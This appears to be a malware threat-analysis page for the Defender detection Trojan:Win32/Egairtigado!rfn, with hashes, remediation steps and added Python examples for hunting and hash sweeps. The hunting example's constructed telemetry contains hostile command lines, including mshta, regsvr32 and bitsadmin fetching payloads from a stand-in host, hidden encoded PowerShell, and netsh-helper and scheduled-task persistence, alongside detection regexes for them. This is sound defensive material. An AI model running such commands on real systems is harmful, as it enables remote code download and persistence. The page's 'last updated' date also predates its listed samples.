user@threatcheck.sh ~ threat-analysis
$ analyze-threat Trojan:Win32/Egairtigado!rfn
Trojan:Win32/Egairtigado!rfn - Windows Defender threat signature analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:Win32/Egairtigado!rfn
Classification:
Type: Trojan
Platform: Win32
Family: Egairtigado
Detection Type: Concrete (known malware family with identified signatures)
Suffix: !rfn (a Microsoft-internal signature category suffix; it is not a family name and does not indicate ransomware, which Defender would label with the Ransom: type)
Confidence: Very High
False-Positive Risk: Low

Concrete signature match: a Trojan (appears legitimate but performs malicious actions) targeting the 32-bit Windows platform, family Egairtigado.

Summary:

Trojan:Win32/Egairtigado!rfn is a concrete detection that this report associates with the TigerRAT backdoor attributed to the Andariel APT group. The attribute strings the signature references (listed below) tag API hooking and abuse of legitimate Windows utilities (mshta, regsvr32, rundll32, PowerShell, BITS jobs, scheduled tasks, netsh helper DLLs) for execution, persistence and defence evasion, together with data encoding, remote file copy and remote service creation, the capability set of a remote-access tool: remote control, data exfiltration and evasion. The associated samples below include a file named Gh0st.exe and a Win64 generic detection, so corroborate the family attribution against the hashes in your own telemetry rather than relying on the signature name alone.

Severity: Critical
VDM Static Detection:
Attribute strings (!#HSTR sub-signatures) referenced by this threat; names such as StringCodeForHooking.C describe a capability the sample exhibits, not a family-unique marker:
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
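The attribute strings above describe how the sample executes and persists; the useful thing to do with them on the defending side is to turn each abused utility into a hunting rule over process-creation telemetry. The following is an added example written for this page, not code from threatcheck.sh or from Microsoft. The log format, host names, user names and command lines are constructed for the example; the regexes cover the classic abuse forms of each utility and should be tuned before alerting on them.

```python
"""Added example, not part of the threatcheck.sh report: turn the capability
attributes the VDM strings above tag (mshta, regsvr32, rundll32, BITS jobs,
PowerShell, scheduled tasks, netsh helper DLLs, remote services) into
process-creation hunting rules and run them over constructed telemetry."""
import re
from dataclasses import dataclass

# One rule per abused utility. Patterns cover the classic abuse forms only
# (remote/inline script for mshta, regsvr32 and rundll32; download or notify
# command for BITS; hidden/encoded PowerShell; task, helper-DLL and remote
# service creation). Tune to your environment before alerting on them.
RULES = [
    ("mshta-remote-or-inline",
     re.compile(r"\bmshta(\.exe)?\b.*(https?:|vbscript:|javascript:)", re.I)),
    ("regsvr32-remote-scriptlet",
     re.compile(r"\bregsvr32(\.exe)?\b.*/i:https?:", re.I)),
    ("rundll32-inline-script",
     re.compile(r"\brundll32(\.exe)?\b.*(javascript:|vbscript:)", re.I)),
    ("bits-download-or-notify",
     re.compile(r"\bbitsadmin\b.*(/transfer|/setnotifycmdline)|Start-BitsTransfer", re.I)),
    ("powershell-hidden-or-encoded",
     re.compile(r"\bpowershell(\.exe)?\b.*(-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden)", re.I)),
    ("schtasks-create",
     re.compile(r"\bschtasks(\.exe)?\b.*/create\b", re.I)),
    ("netsh-helper-dll",
     re.compile(r"\bnetsh(\.exe)?\b.*\badd\s+helper\b", re.I)),
    ("remote-service-create",
     re.compile(r"\bsc(\.exe)?\b\s+\\\\\S+\s+create\b", re.I)),
]

# Constructed for this example; not real telemetry. Format: timestamp|host|user|command line.
SAMPLE_EVENTS = [
    "2026-03-23T10:01:02Z|WS-0412|CORP\\jdoe|C:\\Windows\\System32\\mshta.exe http://203.0.113.5/upd.hta",
    "2026-03-23T10:01:09Z|WS-0412|CORP\\jdoe|regsvr32.exe /s /n /u /i:http://203.0.113.5/a.sct scrobj.dll",
    "2026-03-23T10:02:30Z|WS-0412|CORP\\jdoe|schtasks /create /sc minute /mo 15 /tn Updater /tr C:\\Users\\Public\\svc.exe",
    "2026-03-23T10:02:45Z|WS-0412|NT AUTHORITY\\SYSTEM|netsh add helper C:\\Users\\Public\\nhelp.dll",
    "2026-03-23T10:03:00Z|WS-0412|CORP\\jdoe|powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "2026-03-23T10:05:00Z|WS-0412|CORP\\jdoe|bitsadmin /transfer job1 http://203.0.113.5/p.bin C:\\Users\\Public\\p.bin",
    "2026-03-23T10:06:00Z|WS-0099|CORP\\asmith|rundll32.exe shell32.dll,Control_RunDLL",
    "2026-03-23T10:07:00Z|WS-0099|CORP\\asmith|powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1",
]


@dataclass(frozen=True)
class Hit:
    rule: str
    timestamp: str
    host: str
    user: str
    command_line: str


def scan_lines(lines):
    """Return one Hit per (event, rule) match. The split assumes the constructed
    'timestamp|host|user|command line' layout; maxsplit keeps pipes inside the
    command line intact. Adapt the split to your Sysmon/EDR export."""
    hits = []
    for line in lines:
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        timestamp, host, user, cmd = line.split("|", 3)
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append(Hit(name, timestamp, host, user, cmd))
    return hits


def hosts_by_rule_count(hits):
    """Hosts ordered by how many distinct rules fired on them. A host chaining
    several living-off-the-land steps is the one to isolate first."""
    seen = {}
    for h in hits:
        seen.setdefault(h.host, set()).add(h.rule)
    return sorted(((host, len(rules)) for host, rules in seen.items()), key=lambda t: -t[1])


if __name__ == "__main__":
    found = scan_lines(SAMPLE_EVENTS)
    for h in found:
        print(f"{h.timestamp} {h.host} {h.user} [{h.rule}] {h.command_line}")
    print(hosts_by_rule_count(found))
```

On the constructed events the benign rundll32 and PowerShell uses on WS-0099 produce no hits, while WS-0412 trips six distinct rules in a few minutes, which is the chained execution-plus-persistence pattern the attribute strings describe.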
Known malware which is associated with this threat (file name as reported, SHA-256, date reported):
Filename: wzyak9hrh.exe
SHA-256: 48548d9678e0433d52837ba124819ae8e7ee54641a96936b32b46deb312f2463
Reported: 23/03/2026
Filename: 824CB7842629A59CC56B5C86CF29CE6B.exe
SHA-256: c8e41815770b17624a724a6f16be26a55f8d7fdb12dba529efb4b388ac19f8e3
Reported: 23/03/2026
Filename: Gh0st.exe
SHA-256: 4d0ac144f8c297610edb552710c198eef0bac2ac1cacd8210a437941dae3987d
Reported: 23/03/2026
Filename: SecuriteInfo.com.Win64.MalwareX-gen.54486257
SHA-256: 8428d2db1f70caaa79934f30068fb4eddd4874ca5702ad53c5c8c12c46513f24
Reported: 23/03/2026
Filename: ea26d6a614701b03.exe
SHA-256: ea26d6a614701b039394bf7cf50b7cf63ad98fb90c0328e5ffd87ccdb9816be8
Reported: 23/03/2026
Filename: x346e75418d57e184806.exe
SHA-256: 346e75418d57e1848064614e3922813955ca10e7d015ba3679f9036ac31fa1bd
Reported: 23/03/2026
SHA-256: 5ae30eecdfb95d98cf238ff69b392cb36d1d3fb09481d79fa92c69dad48a0df0
Reported: 22/03/2026
Remediation Steps:
Isolate the affected host immediately. Run a full scan with current signatures, then investigate forensically to establish the initial access vector, the scope of the compromise and any lateral movement. Because the signature's attribute strings tag persistence through scheduled tasks, BITS jobs and netsh helper DLLs, enumerate those explicitly (schtasks /query /v /fo list; Get-BitsTransfer -AllUsers; the helper DLLs registered under HKLM\SOFTWARE\Microsoft\NetSh) and remove anything the system owner cannot account for. Block the SHA-256 hashes listed above in endpoint protection, reset every credential the host could have exposed, and add the indicators to network and endpoint monitoring.
=== END REPORT ===
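The hash list and the remediation steps both come down to one concrete action: sweep the estate for the seven SHA-256 values and act on any match. The block below is an added example written for this page, not threatcheck.sh's own tooling. The hashes, file names and dates are copied from the report; the directory tree that demo() scans is constructed on the fly, and the stand-in "dropped.exe" is a harmless byte string whose hash is added to an extended indicator set purely to show a match firing.

```python
"""Added example, not part of the threatcheck.sh report: sweep a directory
tree for the SHA-256 indicators listed under "Known malware" and report
matches. Indicator values are copied from the report; the tree scanned in
demo() is constructed on the fly."""
import hashlib
import os
import tempfile
from pathlib import Path

# SHA-256 -> (file name as reported, date reported). The report gives no
# file name for the last entry, so it is left as None rather than guessed.
REPORT_IOCS = {
    "48548d9678e0433d52837ba124819ae8e7ee54641a96936b32b46deb312f2463": ("wzyak9hrh.exe", "23/03/2026"),
    "c8e41815770b17624a724a6f16be26a55f8d7fdb12dba529efb4b388ac19f8e3": ("824CB7842629A59CC56B5C86CF29CE6B.exe", "23/03/2026"),
    "4d0ac144f8c297610edb552710c198eef0bac2ac1cacd8210a437941dae3987d": ("Gh0st.exe", "23/03/2026"),
    "8428d2db1f70caaa79934f30068fb4eddd4874ca5702ad53c5c8c12c46513f24": ("SecuriteInfo.com.Win64.MalwareX-gen.54486257", "23/03/2026"),
    "ea26d6a614701b039394bf7cf50b7cf63ad98fb90c0328e5ffd87ccdb9816be8": ("ea26d6a614701b03.exe", "23/03/2026"),
    "346e75418d57e1848064614e3922813955ca10e7d015ba3679f9036ac31fa1bd": ("x346e75418d57e184806.exe", "23/03/2026"),
    "5ae30eecdfb95d98cf238ff69b392cb36d1d3fb09481d79fa92c69dad48a0df0": (None, "22/03/2026"),
}


def sha256_of(path: Path, chunk: int = 1 << 20) -> str:
    """Stream the file in 1 MiB chunks so large binaries do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def is_known_hash(digest: str, iocs=REPORT_IOCS) -> bool:
    """Case- and whitespace-insensitive lookup, since feeds disagree on hex casing."""
    return digest.strip().lower() in iocs


def sweep(root, iocs=REPORT_IOCS):
    """Walk root and return [(path, sha256, reported_name)] for every file
    whose hash is in the indicator set. Unreadable or vanished files are
    skipped rather than aborting the whole sweep."""
    matches = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            try:
                digest = sha256_of(p)
            except OSError:
                continue
            if digest in iocs:
                matches.append((str(p), digest, iocs[digest][0]))
    return matches


def demo():
    """Constructed tree: one benign text file and one harmless stand-in
    'dropped.exe' (a fixed byte string, not malware). Returns the sweep result
    against the report's hashes alone and against the set extended with the
    stand-in's hash, so both the no-match and the match paths are exercised."""
    root = Path(tempfile.mkdtemp(prefix="ioc-sweep-"))
    (root / "readme.txt").write_bytes(b"nothing to see here\n")
    sample = root / "dropped.exe"
    sample.write_bytes(b"MZ" + b"\x00" * 62 + b"constructed stand-in, not real malware")
    extended = dict(REPORT_IOCS)
    extended[sha256_of(sample)] = ("dropped.exe", "constructed")
    return sweep(root, REPORT_IOCS), sweep(root, extended)


if __name__ == "__main__":
    baseline, with_sample = demo()
    print("matches against report hashes only:", baseline)
    for path, digest, reported in with_sample:
        print(f"MATCH {path} {digest} (reported as {reported})")
```

Point sweep() at a mounted image or a live file system to use it for real; on a live host run it from a read-only or forensic context first, since hashing every file on a compromised machine is itself noisy and slow.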
$ reanalyze-threat
This analysis was last updated on 22/01/2026. Do you want to analyze it again?